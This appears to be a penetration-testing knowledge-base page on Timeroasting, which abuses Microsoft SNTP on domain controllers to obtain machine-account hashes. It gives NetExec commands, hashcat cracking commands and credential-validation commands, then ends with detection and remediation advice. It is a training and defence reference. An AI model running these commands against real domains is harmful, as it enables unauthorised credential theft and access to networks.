Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access / Techniques

Timeroasting

Timeroasting targets machine accounts by abusing Microsoft SNTP authentication on domain controllers.

It is niche, but it can produce crackable material for machine accounts when UDP/123 is reachable.


Requirements

Domain controller reachable on UDP/123
Machine accounts in the domain
Tooling that supports MS-SNTP timeroast
Hashcat mode 31300

Domain controllers usually expose time service because Kerberos depends on time synchronization.


NetExec

Run:

sudo nxc smb 10.10.10.200 -M timeroast

Save output:

sudo nxc smb 10.10.10.200 -M timeroast | tee timeroast.txt

Extract hashes into:

timeroast.hashes

Crack

Hashcat mode:

31300
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt --show

Validate

If a machine account password is cracked:

nxc smb 10.10.10.200 -d ootw.local -u 'MACHINE$' -p 'cracked-password'
nxc ldap 10.10.10.200 -d ootw.local -u 'MACHINE$' -p 'cracked-password'

Quote machine account names because $ has shell meaning.


Detection

Defenders look for:

  • unusual UDP/123 traffic volume to domain controllers
  • NTP requests from non-standard clients
  • follow-on authentication using machine accounts
  • machine account logons from unexpected source hosts
  • NetExec execution on attacker-controlled systems

Standard Windows event logs may not clearly expose the roast itself. Network telemetry is important.


Remediation

  • restrict UDP/123 access to expected clients where possible
  • monitor abnormal time service requests to DCs
  • rotate suspected machine account passwords
  • remove stale computer accounts
  • alert on machine account logons from non-machine sources